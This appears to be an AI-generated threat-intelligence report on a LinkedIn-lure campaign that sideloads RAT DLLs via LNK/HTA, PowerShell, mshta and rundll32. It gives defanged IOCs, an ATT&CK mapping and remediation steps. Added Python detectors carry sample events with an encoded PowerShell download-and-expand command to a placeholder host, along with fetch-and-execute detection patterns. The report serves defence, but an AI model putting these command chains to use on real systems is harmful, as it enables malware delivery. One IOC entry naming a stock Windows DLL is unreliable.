January 23, 2026

LinkedIn Lure — DLL Sideloading RAT Campaign

Protos AI Agent V2

#ThreatIntelligence #DLLSideloading #RATCampaign

Classification: TLP:CLEAR  
Analyst: AI Threat Intelligence

Executive Summary

Attribute      | Value
Risk Level     | HIGH
Key Finding    | Campaign uses social-engineered LinkedIn lures to deliver archives containing LNK/HTA that stage PowerShell/mshta chains and perform DLL sideloading (rundll32/regsvr32) to load RAT/backdoor DLLs.
Primary Action | Block confirmed malicious infrastructure (IP/URL/domain), hunt for rundll32/powershell/mshta execution patterns, and collect sample hashes from the referenced sandbox for file-level enrichment.

Multiple sandbox traces and commercial-feed enrichment show a campaign that begins with LinkedIn messages or job/freelance lures and delivers archives containing decoys and LNK/HTA launchers. The staged chain uses PowerShell and mshta to fetch and expand archives and then relies on DLL sideloading (rundll32/regsvr32) to execute malicious DLLs such as OneDriveUpdate[.]dll and win_oci_*.dll. Delivery and C2 use HTTP(S) endpoints and cloud-hosted storage objects. Blocking and hunting for the observed indicators and command patterns is the highest-priority operational action. Evidence is drawn from sandbox traces and enrichment feeds (Hybrid-Analysis, VirusTotal, Protos) and is summarized with confidence levels below.

Relevant high/medium-confidence technical references are cited in-line where indicators are mentioned (see Evidence References section).

Investigation Objective & Methodology

Original Question: Deep dive into the campaign described by the news headline "Hackers Use LinkedIn Messages to Spread RAT Malware Through DLL Sideloading" — determine attribution (if possible), malware and TTPs used (DLL sideloading specifics), observable IOCs and infrastructure, and prioritized remediation/mitigation steps for analysts.

Scope: Review of public reporting, sandbox traces, and commercial-feed enrichment focusing on observable IOCs (domains, IPs, URLs, DLL filenames), attack chain, MITRE ATT&CK mapping, and prioritized remediation for SOC/CSIRT teams.

Timeframe: Last 30 days (primary artifacts dated / generated 2026-01-21).

Sources Used: Public OSINT (news summaries), sandbox traces (Hybrid-Analysis sample), and commercial threat-feed enrichment (VirusTotal, Protos) as reflected in reviewed artifacts.

Methodology: Synthesize research and sandbox extraction artifacts, validate findings against the fact-check summary, and prioritize HIGH/MEDIUM-confidence findings for operational use. Low/insufficient-confidence claims (notably actor attribution) are flagged and not presented as confirmed.

Background

Public reporting and sandbox outputs describe a phishing-style campaign that leverages professional social media (LinkedIn) to deliver archives containing decoys and launcher artifacts (LNK/HTA). When opened, these launchers execute scripted fetch-and-run chains (PowerShell/mshta) that unpack payloads and invoke legitimate Windows loaders (rundll32.exe / regsvr32.exe) to sideload malicious DLLs, enabling RAT/backdoor execution.

This pattern is consistent with historical LinkedIn/job-lure campaigns delivering commodity RATs (Remcos, HawkEye, DuckTail) but actor-level attribution for the current cluster is not supported by the reviewed artifacts (LOW confidence).

Technical Analysis

Attack Chain (evidence-backed)

  1. Initial Access: Target receives a LinkedIn direct message or shared document link offering freelance/job opportunity or a document to review; message induces download of an archive (RAR/ZIP) containing decoy documents plus an LNK or HTA launcher (MEDIUM confidence — sandbox and reporting).
  2. Staging: User opens LNK/HTA which executes mshta or PowerShell to fetch remote scripts/objects and expand archives (HIGH confidence — observed in sandbox traces).
  3. Loader / Execution: The chain invokes legitimate Windows loaders (for example, rundll32.exe) to load a malicious DLL placed alongside a legitimate binary or passed directly to the loader (HIGH confidence — sandbox traces show rundll32 invocation). Example: rundll32.exe invoked against a malicious DLL such as OneDriveUpdate[.]dll (observed in sandbox traces; HIGH confidence).
  4. Post-execution: The loaded DLL functions as a loader/backdoor (RAT), establishing HTTP(S)-based C2 or fetching further stages from cloud-hosted objects (MEDIUM confidence — sandbox + feed enrichment).

Observed Indicators & Infrastructure (examples)

  • Delivery/C2 IP and URL: hxxp[:]//80[.]76[.]51[.]231/Samarik (host 80[.]76[.]51[.]231) — observed in sandbox downloads and flagged malicious by enrichment feeds — HIGH/MEDIUM confidence depending on feed.
  • Malicious HTA host: mailv[.]mofs-gov[.]org serving the HTA path hxxp[:]//mailv[.]mofs-gov[.]org/.../files-94603e7f/hta used in execution — HIGH confidence.
  • Cloud-hosted staging object: hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt — observed as a remote script fetch target in sandbox traces and flagged in feed enrichment — MEDIUM confidence.
  • Sample / sandbox record: Hybrid-Analysis sample page used as primary sandbox evidence (pull full sample for hashes) — hxxps[:]//hybrid-analysis[.]com/sample/... — HIGH confidence.

Mapped MITRE ATT&CK Techniques (observed / inferred)

  • T1598.002: Phishing: Spearphishing via Social Media — LinkedIn messages used to lure recipients (MEDIUM confidence).
  • T1204.002: User Execution: Malicious Link / Shortcut (LNK/HTA) — user opens LNK/HTA leading to execution (HIGH confidence).
  • T1218.005: Mshta — mshta used to execute HTA content (MEDIUM/HIGH confidence).
  • T1059.001: Command and Scripting Interpreter: PowerShell — PowerShell fetch + Expand-Archive + iex observed (HIGH confidence).
  • T1574.001: DLL Side-Loading — use of rundll32/regsvr32 to execute malicious DLLs (HIGH confidence).
  • T1036.005: Masquerading — malicious binaries using legitimate-sounding names (e.g., OneDriveUpdate[.]dll) to evade detection (MEDIUM confidence).
  • T1071.001: Application Layer Protocol: Web Protocols — HTTP/HTTPS-based C2 and cloud-hosted fetch observed (MEDIUM confidence).

Indicators of Compromise (defanged)

All indicators below are defanged (dots -> '[.]', http(s) -> hxxp/hxxps). Only HIGH or MEDIUM confidence IOCs are included (per reviewed fact-check and enrichment artifacts).

Type         | Indicator (defanged)                                                                                       | Context / Confidence
Domain       | mailv[.]mofs-gov[.]org                                                                                     | HTA host observed in sandbox; HIGH
IP           | 80[.]76[.]51[.]231                                                                                         | Download/C2 IP observed; HIGH
URL          | hxxp[:]//80[.]76[.]51[.]231/Samarik                                                                        | Delivery URL observed in sandbox; HIGH
URL          | hxxp[:]//mailv[.]mofs-gov[.]org/.../files-94603e7f/hta                                                     | HTA delivery path observed; HIGH
URL          | hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt                                   | Cloud OSS object used for script fetch; MEDIUM
URL          | hxxps[:]//hybrid-analysis[.]com/sample/0bfcf2c23845a700e67bbdef6fb60528a501f518e4d3ba83a61f997ae40d6530   | Sandbox sample page — pull full hashes; HIGH
DLL filename | OneDriveUpdate[.]dll                                                                                       | Loaded by rundll32 in sandbox traces; HIGH
DLL filename | win_oci_41aa0d5[.]dll (win_oci_*.dll)                                                                      | Filename pattern observed across samples; MEDIUM
DLL filename | bcryptprimitives[.]dll                                                                                     | Module observed in runtime traces; MEDIUM
IP           | 91[.]234[.]254[.]106                                                                                       | Observed in sandbox curl download example; MEDIUM

Notes: All IOCs above are taken from sandbox traces and enrichment artifacts. Prioritize BLOCK/HUNT for indicators with HIGH confidence first. Do not operationally act on any IOC without applying your internal validation and enrichment process.

Infrastructure Summary

  • mailv[.]mofs-gov[.]org: Observed serving an HTA path used in delivery — flagged malicious by sandbox evidence and threat-feed enrichment (HIGH confidence).
  • IP / URL cluster: 80[.]76[.]51[.]231 and hxxp[:]//80[.]76[.]51[.]231/Samarik — observed in sandbox download traces and flagged malicious by VirusTotal / Protos enrichment (HIGH confidence).
  • Cloud object store: fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com (object new-artist[.]txt) used as a remote script host in observed chains (MEDIUM confidence).

Operational note: Passive scans and WHOIS lookups in the reviewed infrastructure artifact showed inconsistent indexing versus enrichment feeds; absence from passive indexing does not imply benign status. Prioritize internal telemetry correlation and file-hash enrichment (pull full Hybrid-Analysis sample) to strengthen network/infrastructure mapping.

Detection & Hunting Recommendations

Immediate detection rules and hunts (Priority 1 - 🚨):

  1. EDR rule: Detect rundll32[.]exe executing DLLs from user-writable locations (Desktop, %TEMP%, %USERPROFILE%) and specifically match OneDriveUpdate[.]dll and win_oci_* filename patterns (HIGH confidence).
  2. EDR / SIEM rule: Detect powershell[.]exe invocations with patterns: Invoke-WebRequest / Expand-Archive / iex fetching from remote hosts — hunt for contacts to fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com and 80[.]76[.]51[.]231/Samarik (HIGH confidence).
  3. EDR rule: Detect mshta[.]exe executions that reference remote HTA paths or local HTA files originating from user folders; hunt for downloads from mailv[.]mofs-gov[.]org (HIGH confidence).
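The three Priority 1 rules above, implemented as a small rule set run over constructed EDR-style process-creation events. This is an added example and is not code from the report or from Protos; the event field names (Id, Image, CommandLine, ParentImage), the user name, file paths and the staging.example.test host are assumptions. Beyond the three rules as written, it decodes -EncodedCommand before matching (the tuning note's normalization applied in practice), requires both the fetch and the expand/iex stage before the PowerShell rule fires to cut noise, and treats a rundll32 spawned by powershell/mshta as the process tree described in the Priority 2 hunt.

```python
"""Priority 1 process-creation rules from the report, run over constructed EDR-style events.
Added example; the event shape (Id, Image, CommandLine, ParentImage) is an assumption."""
import base64
import re
from typing import Optional

# The report names Desktop, %TEMP% and %USERPROFILE%; on a default install these all sit under
# C:\Users\, so the whole profile tree is treated as user-writable here (an assumption).
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.I)
# DLL names from the report's IOC table; win_oci_* is the observed filename pattern.
SUSPECT_DLL = re.compile(r"\\(onedriveupdate\.dll|win_oci_[0-9a-f]+\.dll)$", re.I)
DLL_ARG = re.compile(r'"?([a-z]:\\[^",]+\.dll)"?', re.I)
PS_FETCH = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)
PS_STAGE = re.compile(r"expand-archive|\biex\b|invoke-expression", re.I)
SCRIPT_HOST_PARENT = re.compile(r"\\(powershell|mshta)\.exe$", re.I)
HTA_REMOTE = re.compile(r"https?://", re.I)
HTA_LOCAL = re.compile(r'[a-z]:\\users\\[^\s"]+\.hta', re.I)
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def normalize_powershell(cmdline: str) -> str:
    """Tuning note from the report: decode -EncodedCommand (base64 of UTF-16LE) before matching,
    appending the plaintext so the same patterns apply to encoded and plain invocations."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def evaluate(ev: dict) -> Optional[list]:
    """Return the rule labels an event trips, or None if it looks benign under these rules."""
    image = ev["Image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["CommandLine"]
    hits = []
    if image == "rundll32.exe":                      # Rule 1: sideload via rundll32
        m = DLL_ARG.search(cmd)
        if m:
            dll = m.group(1)
            if USER_WRITABLE.match(dll):
                hits.append("dll_in_user_writable_path")
            if SUSPECT_DLL.search(dll):
                hits.append("known_sideload_dll_name")
            if SCRIPT_HOST_PARENT.search(ev.get("ParentImage", "")):
                hits.append("parent_is_script_host")  # LNK/HTA -> script host -> rundll32 tree
    elif image == "powershell.exe":                  # Rule 2: fetch + expand/iex chain
        cmd = normalize_powershell(cmd)
        if PS_FETCH.search(cmd) and PS_STAGE.search(cmd):  # require both stages to cut noise
            hits += ["remote_fetch", "archive_expand_or_iex"]
    elif image == "mshta.exe":                       # Rule 3: remote HTA or HTA from user folder
        if HTA_REMOTE.search(cmd):
            hits.append("remote_hta")
        if HTA_LOCAL.search(cmd):
            hits.append("hta_from_user_folder")
    return hits or None


def run_rules(events: list) -> list:
    """Evaluate every event and keep (Id, labels) for those that tripped at least one rule."""
    results = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            results.append((ev["Id"], hits))
    return results


def _enc(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (for the sample only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; the user name, paths and the staging host are placeholders.
SAMPLE_EVENTS = [
    {"Id": "e1", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\OneDriveUpdate.dll",Start',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Id": "e2", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Id": "e3", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(
         "Invoke-WebRequest http://staging.example.test/a.zip -OutFile $env:TEMP\\a.zip; "
         "Expand-Archive $env:TEMP\\a.zip"),
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Id": "e4", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\Downloads\contract.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Id": "e5", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -Command Get-Process",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for event_id, labels in run_rules(SAMPLE_EVENTS):
        print(event_id, labels)
```

Events e2 (a stock Control Panel invocation) and e5 (an ordinary administrative command) pass through untouched, which is the point of requiring a user-writable path or a known name for rundll32 and both a fetch and a staging verb for PowerShell; widen USER_WRITABLE to match your own profile and redirected-folder layout before deploying.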

Hunt patterns & enrichment (Priority 2 - ⚠️):

  • Search EDR/telemetry for process trees matching LNK/hta -> mshta/powershell -> rundll32/regsvr32 and capture any dropped DLLs for hashing.
  • Correlate related file hashes reported by VirusTotal for 80[.]76[.]51[.]231 against internal telemetry.
  • Hunt proxy/web logs for HTTP GET/POST requests to the listed URLs and cloud object paths; extract objects for file-level scanning and submit to VT/Protos.

Detection tuning notes:

  • Avoid overly broad blocking of cloud-hosting domains unless object-level confirmation exists; prefer blocking specific paths (e.g., new-artist[.]txt) and IPs/URLs explicitly flagged as malicious.
  • Normalize PowerShell encoding/obfuscation when writing detections and include white-listing exceptions for known legitimate services.
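The IOC table above is published defanged, and the Priority 2 hunt asks for proxy/web log matches against those indicators. The following added example (not code from the report or from Protos) refangs the table's indicators, scans constructed proxy log lines for contacts, and applies the tuning note: the shared Alibaba OSS host is matched only by its full object path, while the dedicated domain and IPs are matched at host level. The log line layout, client addresses and timestamps are assumptions.

```python
"""Refang the report's defanged IOCs and match them against proxy log lines.
Added example, not part of the report; the log line layout is an assumption."""
import re
from typing import Optional
from urllib.parse import urlsplit

# Host-level indicators copied from the report's IOC table (defanged as published).
IOC_HOSTS = ["mailv[.]mofs-gov[.]org", "80[.]76[.]51[.]231", "91[.]234[.]254[.]106"]
# URL-level indicators; the shared OSS host is matched only by its full object path,
# following the tuning note against blocking whole cloud-hosting domains.
IOC_URLS = [
    "hxxp[:]//80[.]76[.]51[.]231/Samarik",
    "hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt",
]


def refang(ioc: str) -> str:
    """Reverse the report's defanging: '[.]' -> '.', '[:]' -> ':', hxxp(s) -> http(s)."""
    out = ioc.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", out, flags=re.I)


def defang(value: str) -> str:
    """Defang a live value for tickets and reports, using the same convention as the table."""
    out = re.sub(r"^http", "hxxp", value, flags=re.I)
    return out.replace("://", "[:]//").replace(".", "[.]")


def classify(url: str, hosts: set, urls: set) -> Optional[str]:
    """'url' for an exact indicator URL, 'host' for a flagged host, None otherwise."""
    if url.lower() in urls:
        return "url"
    host = (urlsplit(url).hostname or "").lower()
    return "host" if host in hosts else None


def scan_proxy_log(log_text: str) -> list:
    """Scan lines of the form '<ts> <client> <method> <url> <status>' for indicator contacts."""
    hosts = {refang(h).lower() for h in IOC_HOSTS}
    urls = {refang(u).lower() for u in IOC_URLS}
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, url, _status = parts[:5]
        match = classify(url, hosts, urls)
        if match is None:
            continue
        indicator = url if match == "url" else (urlsplit(url).hostname or "")
        hits.append({"ts": ts, "client": client, "match": match, "indicator": defang(indicator)})
    return hits


# Constructed proxy log; client addresses and timestamps are placeholders. Line 3 is a
# different bucket on the same OSS host and must not match; line 5 hits the HTA host only.
SAMPLE_PROXY_LOG = """\
2026-01-21T10:14:02Z 10.0.0.15 GET http://80.76.51.231/Samarik 200
2026-01-21T10:14:05Z 10.0.0.15 GET http://fixedzip.oss-ap-southeast-5.aliyuncs.com/new-artist.txt 200
2026-01-21T10:15:11Z 10.0.0.22 GET http://other-bucket.oss-ap-southeast-5.aliyuncs.com/report.pdf 200
2026-01-21T10:16:40Z 10.0.0.31 GET https://www.example.com/ 200
2026-01-21T10:17:03Z 10.0.0.15 GET http://mailv.mofs-gov.org/ 404
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

Hits are emitted with the indicator re-defanged so they can be pasted straight into a ticket; the three contacts all come from one client, which is the pivot the isolation step in the remediation table needs.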

Remediation & Mitigation

Immediate Actions (Priority 1 - 🚨)

# | Action | Rationale
1 | Block IP 80[.]76[.]51[.]231 and URL hxxp[:]//80[.]76[.]51[.]231/Samarik at perimeter, proxy, and EDR controls. | Observed as delivery URL and flagged malicious by VT/Protos (HIGH confidence).
2 | Block domain mailv[.]mofs-gov[.]org and the specific HTA path; hunt for downloads or executions referencing this FQDN. | Domain and HTA path observed in sandbox traces and enrichment (HIGH confidence).
3 | Isolate affected hosts and collect full memory/disk artifacts where rundll32, PowerShell, or mshta execution is detected; submit recovered DLLs to VT/Protos for file-level enrichment. | File-level hashes are missing from reviewed artifacts; retrieval is required to expand linkage and confirm AV detections (MEDIUM–HIGH confidence).

Short-term Actions (Priority 2 - ⚠️)

# | Action | Rationale
1 | Retrieve the Hybrid-Analysis sample record and extract full file hashes (MD5/SHA1/SHA256) for submission to VirusTotal and Protos. | Hybrid-Analysis sample page is the primary sandbox evidence and will provide definitive file-level artifacts for enrichment (HIGH confidence).
2 | Extract and submit the object retrieved from fixedzip[.]oss-* (new-artist[.]txt) if present in network logs; submit for AV analysis and correlate resulting hashes. | Cloud object used in script fetch; obtaining a file-level hash closes an evidence gap and strengthens linkage (MEDIUM confidence).

Long-term Improvements (Priority 3 - 🎯)

  • Harden user education: targeted communication on risks of opening unsolicited LinkedIn attachments/links and procedures to verify recruiters/contacts.
  • Application allowlisting: restrict user ability to run rundll32/regsvr32 from non-standard locations and block execution of mshta/powershell when invoked from user document contexts where feasible.
  • Improve archive-sandboxing: route compressed archives from external social-media sources through automated sandboxing prior to user delivery.

Confidence & Limitations

High Confidence Findings (evidence available in reviewed artifacts):

  • DLL sideloading via rundll32/regsvr32 with OneDriveUpdate[.]dll observed in sandbox traces (HIGH).

Medium Confidence Findings:

  • Initial vector via LinkedIn messages with LNK/HTA (MEDIUM) — supported by sandbox and reporting but lacking independent closed-source confirmation.
  • Cloud-hosted object staging (fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt) — observed in sandbox and Protos enrichment (MEDIUM).

Low / Insufficient Confidence:

  • Actor-level attribution to a named intrusion set or mercenary spyware operator (LOW) — artifacts do not provide multi-source corroboration; closed-source vendor telemetry would be required to raise confidence.

Limitations:

  • Reviewed artifacts did not include full file hashes for the primary Hybrid-Analysis sample — file-level hashing is required to broaden AV consensus and linkages.
  • Passive scanning and WHOIS lookups returned inconsistent results versus feed enrichment; reconcile by pulling authoritative sandbox records and internal telemetry.

Evidence References

Key evidence items (primary artifacts and enrichment references):

  • Hybrid-Analysis sandbox sample page (detailed execution strings, modules, and network calls): hxxps[:]//hybrid-analysis[.]com/sample/0bfcf2c23845a700e67bbdef6fb60528a501f518e4d3ba83a61f997ae40d6530.
  • Malicious domain and HTA path observed in sandbox traces and enrichment: mailv[.]mofs-gov[.]org / hxxp[:]//mailv[.]mofs-gov[.]org/.../files-94603e7f/hta.
  • Delivery/C2 IP and URL with multi-engine VT detections and Protos labels: 80[.]76[.]51[.]231 / hxxp[:]//80[.]76[.]51[.]231/Samarik.
  • Cloud-hosted object used for remote script fetch: fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com / hxxp[:]//fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt.
  • Observed malicious DLL and execution tool references: OneDriveUpdate[.]dll, win_oci_41aa0d5[.]dll, rundll32[.]exe.

Prepared by: AI Threat Intelligence
